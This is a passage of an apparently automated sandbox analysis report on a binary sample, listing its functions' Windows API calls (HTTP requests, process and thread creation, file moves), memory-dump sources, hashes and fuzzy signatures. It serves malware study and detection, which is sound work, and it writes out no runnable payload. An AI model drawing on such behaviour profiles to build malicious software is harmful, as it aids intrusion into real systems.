                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00E5D200
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                  • String ID: U
                                                                                                                  • API String ID: 4009187628-3372436214
                                                                                                                  • Opcode ID: 7278ff14823fe720d1ffe34e55d467b48fcf03f3b6b8d6e32a13bf82a2c6593c
                                                                                                                  • Instruction ID: 05d30f36c313fef2be7327f671b6a8f6466e4a962a922f88078fddbf6c391a92
                                                                                                                  • Opcode Fuzzy Hash: 7278ff14823fe720d1ffe34e55d467b48fcf03f3b6b8d6e32a13bf82a2c6593c
                                                                                                                  • Instruction Fuzzy Hash: 53710230508209DFCF318F64CD80AFA3BB6FF48355F18AA69ED55AA1A5C7308859CF60
                                                                                                                  Function 00E345C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E345FF
                                                                                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00E3462B
                                                                                                                  • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00E3466D
                                                                                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00E34682
                                                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E3468F
                                                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00E346BF
                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00E34706
                                                                                                                    • Part of subcall function 00E35052: GetLastError.KERNEL32(?,?,00E343CC,00000000,00000000,00000001), ref: 00E35067
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1241431887-3916222277
                                                                                                                  • Opcode ID: df5f0aa336cb8a5e4630c19f5c15425a8d2d5cb37d8b28e82de12102b6529c57
                                                                                                                  • Instruction ID: d7b85ac4957c23a8d078f3826367159a60d449b50f911287e25ece8426bc0c17
                                                                                                                  • Opcode Fuzzy Hash: df5f0aa336cb8a5e4630c19f5c15425a8d2d5cb37d8b28e82de12102b6529c57
                                                                                                                  • Instruction Fuzzy Hash: 174171B2A05605BFEB059F50DC8AFFB7BACFF09354F005016FA05AA181D7B0A944CBA5
                                                                                                                  Function 00E3B644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00E7DC00), ref: 00E3B715
                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00E7DC00), ref: 00E3B749
                                                                                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00E3B8C1
                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00E3B8EB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 560350794-0
                                                                                                                  • Opcode ID: dc3b250832bab97d2724c8d3127ba7af3908fc7d6a1b60eea102ec48d4c400e9
                                                                                                                  • Instruction ID: 030dc6834cf712f560d36003575ff316648130716a2af2781cf9ed3167a678cc
                                                                                                                  • Opcode Fuzzy Hash: dc3b250832bab97d2724c8d3127ba7af3908fc7d6a1b60eea102ec48d4c400e9
                                                                                                                  • Instruction Fuzzy Hash: DBF13075A00109EFCF14DF94C888EAEBBB9FF89315F109459FA06AB250DB71AD45CB50
                                                                                                                  Function 00E424D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00E424F5
                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E42688
                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E426AC
                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E426EC
                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E4270E
                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E4286F
                                                                                                                  • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00E428A1
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00E428D0
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00E42947
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4090791747-0
                                                                                                                  • Opcode ID: 61c324d16344132d5e8350eb55890a0cee2042305de337dab5dbbf89e41d1361
                                                                                                                  • Instruction ID: 83c3dab0c8355dc16755b2e658a85056fcf638947abeceac540b98e9b62df224
                                                                                                                  • Opcode Fuzzy Hash: 61c324d16344132d5e8350eb55890a0cee2042305de337dab5dbbf89e41d1361
                                                                                                                  • Instruction Fuzzy Hash: 22D1B031604340DFCB14EF25D891A6EBBE1EF84314F59945DFA89AB2A2DB31DC44CB62
                                                                                                                  Function 00DFB73E Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00DFB759,?,00000000,?,?,?,?,00DFB72B,00000000,?), ref: 00DFBA58
                                                                                                                  • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00DFB72B), ref: 00DFB7F6
                                                                                                                  • KillTimer.USER32(00000000,?,00000000,?,?,?,?,00DFB72B,00000000,?,?,00DFB2EF,?,?), ref: 00DFB88D
                                                                                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 00E5D8A6
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00E5D91C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2402799130-0
                                                                                                                  • Opcode ID: b54800f0502e942a4877e0757ea90d2c60b64828638544ef059c4c85caf5829a
                                                                                                                  • Instruction ID: 6313fc53abd83187f3d66d1451f3b7ea91bb66822c5d95955494ccec683239be
                                                                                                                  • Opcode Fuzzy Hash: b54800f0502e942a4877e0757ea90d2c60b64828638544ef059c4c85caf5829a
                                                                                                                  • Instruction Fuzzy Hash: 2661BD30504704DFDB359F16DD88B3577B5FBC9366F19941AE582A6A60C7B0B888CBA0
                                                                                                                  Function 00E4B33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00E4B3F4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InvalidateRect
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 634782764-0
                                                                                                                  • Opcode ID: 37a91c5a5ca5cd4382709d105118577310f8b20b985e1959dcef81141d14673f
                                                                                                                  • Instruction ID: df9517baf7edb5e6fc07e248212dbe2a720bd40531bdcf1de333f30994a728c5
                                                                                                                  • Opcode Fuzzy Hash: 37a91c5a5ca5cd4382709d105118577310f8b20b985e1959dcef81141d14673f
                                                                                                                  • Instruction Fuzzy Hash: B451E530600204BFEF249F2AEC85BAE7BA5EB05768F646011F625F61E2D7B1E944CB51
                                                                                                                  Function 00DFA699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00E5DB1B
                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E5DB3C
                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00E5DB51
                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00E5DB6E
                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00E5DB95
                                                                                                                  • DestroyCursor.USER32(00000000), ref: 00E5DBA0
                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00E5DBBD
                                                                                                                  • DestroyCursor.USER32(00000000), ref: 00E5DBC8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3992029641-0
                                                                                                                  • Opcode ID: 6344d9427e90579e99a546ca40aef3f20f1d2cef87baa1ec82ef831fc1ec811e
                                                                                                                  • Instruction ID: 0795e9ff6a81b6e2187e76cbcf6ddb5056c24fc6a43c86e854b36b079782aced
                                                                                                                  • Opcode Fuzzy Hash: 6344d9427e90579e99a546ca40aef3f20f1d2cef87baa1ec82ef831fc1ec811e
                                                                                                                  • Instruction Fuzzy Hash: 80517970A04209EFDB20DF69CC81FAA77F9EB48354F154518FA4AE6290D7B0ED84DB61
                                                                                                                  Function 00E27555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00E26EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E25FA6,?), ref: 00E26ED8
                                                                                                                    • Part of subcall function 00E26EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E25FA6,?), ref: 00E26EF1
                                                                                                                    • Part of subcall function 00E272CB: GetFileAttributesW.KERNEL32(?,00E26019), ref: 00E272CC
                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00E275CA
                                                                                                                  • _wcscmp.LIBCMT ref: 00E275E2
                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00E275FB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 793581249-0
                                                                                                                  • Opcode ID: 216b17fea02316666f1950bc89d9c1ae3dd659b4f8487455ba15e36e12986b9c
                                                                                                                  • Instruction ID: c8b615728355afd9a4872373c25700300f5db340a8b97450d969921539db4a96
                                                                                                                  • Opcode Fuzzy Hash: 216b17fea02316666f1950bc89d9c1ae3dd659b4f8487455ba15e36e12986b9c
                                                                                                                  • Instruction Fuzzy Hash: 185131B2A492299ADF54EB94EC819DE73FCAF08310F1050AAF645F3141EA7497C9CB64
                                                                                                                  Function 00DFEA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00E5DAD1,00000004,00000000,00000000), ref: 00DFEAEB
                                                                                                                  • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00E5DAD1,00000004,00000000,00000000), ref: 00DFEB32
                                                                                                                  • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00E5DAD1,00000004,00000000,00000000), ref: 00E5DC86
                                                                                                                  • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00E5DAD1,00000004,00000000,00000000), ref: 00E5DCF2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ShowWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1268545403-0
                                                                                                                  • Opcode ID: 7d669b668ada9953147170d96712dd3ccd0316a364ce097124529d24fad0baf2
                                                                                                                  • Instruction ID: 3b7579de2c8fb8148f80a4c97da31b94f8d4be7b53abd45251d70173fe808917
                                                                                                                  • Opcode Fuzzy Hash: 7d669b668ada9953147170d96712dd3ccd0316a364ce097124529d24fad0baf2
                                                                                                                  • Instruction Fuzzy Hash: F041047070C288DEC7354B299D8DA3ABB96EB95305F5F9809E387A6571C6B0B884D231
                                                                                                                  Function 00E1B263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00E1AEF1,00000B00,?,?), ref: 00E1B26C
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00E1AEF1), ref: 00E1B273
                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E1AEF1,00000B00,?,?), ref: 00E1B288
                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00E1AEF1,00000B00,?,?), ref: 00E1B290
                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,00E1AEF1,00000B00,?,?), ref: 00E1B293
                                                                                                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00E1AEF1,00000B00,?,?), ref: 00E1B2A3
                                                                                                                  • GetCurrentProcess.KERNEL32(00E1AEF1,00000000,?,00E1AEF1,00000B00,?,?), ref: 00E1B2AB
                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,00E1AEF1,00000B00,?,?), ref: 00E1B2AE
                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,00E1B2D4,00000000,00000000,00000000), ref: 00E1B2C8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1422014791-0
                                                                                                                  • Opcode ID: d5c58ba5816804dde2bbcdb676b3e966cf5f98c5791ce86f14ddae87222e9417
                                                                                                                  • Instruction ID: f8753987dea2b464cc2c15d75f32983de558b84ee4946db22479d4198a3338d3
                                                                                                                  • Opcode Fuzzy Hash: d5c58ba5816804dde2bbcdb676b3e966cf5f98c5791ce86f14ddae87222e9417
                                                                                                                  • Instruction Fuzzy Hash: 72011271744344BFE710AFA5EC4DF5B3BACEB89B40F414411FA04DB2A1C6B09804CB21
                                                                                                                  Function 00E3C43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                  • API String ID: 0-572801152
                                                                                                                  • Opcode ID: f5df12c319f5e960ba8a01223532beebe42b6fd2dc2310d3c7618f896050dbdd
                                                                                                                  • Instruction ID: 888a44db9419da765fdfa1ced4a8bc5899221c1588ad2fd549c964b4ee4ad183
                                                                                                                  • Opcode Fuzzy Hash: f5df12c319f5e960ba8a01223532beebe42b6fd2dc2310d3c7618f896050dbdd
                                                                                                                  • Instruction Fuzzy Hash: 83E1A471A00219AFDF14DFA4D889AEE7BB5EF48754F249029F905BB281D770ED41CBA0
                                                                                                                  Function 00DE86C2 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 155COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memset
                                                                                                                  • String ID: Q\E$[$\$\$]$^
                                                                                                                  • API String ID: 2102423945-1026548749
                                                                                                                  • Opcode ID: e4aab82fbefefc3f4dab561770c125af3395eb559b53ff2e752644b6ae36f9e8
                                                                                                                  • Instruction ID: 194a054a97aecc800c71feae7a56330ce4755b4db32874062da265d9573039a8
                                                                                                                  • Opcode Fuzzy Hash: e4aab82fbefefc3f4dab561770c125af3395eb559b53ff2e752644b6ae36f9e8
